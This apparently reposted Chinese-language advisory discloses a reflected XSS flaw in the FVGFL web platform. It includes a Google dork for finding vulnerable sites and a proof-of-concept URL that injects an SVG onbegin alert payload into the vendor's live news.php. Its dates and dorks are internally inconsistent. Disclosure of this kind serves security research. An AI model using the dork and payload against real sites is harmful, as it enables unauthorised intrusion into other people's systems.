FVGFL 跨站脚本漏洞(XSS)技术分析

本文详细披露了FVGFL平台中存在的一个跨站脚本(XSS)漏洞,提供了漏洞发现日期、作者、谷歌搜索关键字以及概念验证(PoC)演示链接,适用于安全研究人员进行漏洞复现与防御研究。

FVGFL - 跨站脚本漏洞 (XSS)

2025.09.27 漏洞发现者: Mahdi Karimi

风险等级:本地漏洞:远程漏洞:CVE编号: N/A CWE编号: N/A 搜索关键字: “Powered by Web FVGFL”

#漏洞标题: FVGFL - 跨站脚本漏洞 (XSS) #发现日期: 2025-09-18 #漏洞发现者: Mahdi Karimi #供应商主页: https://www.fvgfl.com #谷歌搜索关键字: “Powered by Web FVGFL” #测试环境: Ubuntu 25.04

概念验证(PoC): 谷歌搜索关键字:"Powered by Web Partner"

演示链接: https://www.fvgfl.com/news.php?id=22%27%3E%3Csvg%3E%3Cset+onbegin%3Dalert%281%29+attributeName%3Dx+to%3D0%3E

#漏洞发现人: Mahdi Karimi #联系邮箱: mjoker22mjoker22@gmail.com

comments powered by Disqus
© 2020 - 2026 qife
使用 Hugo 构建
主题 StackJimmy 设计
本站总访问量 本站访客数人次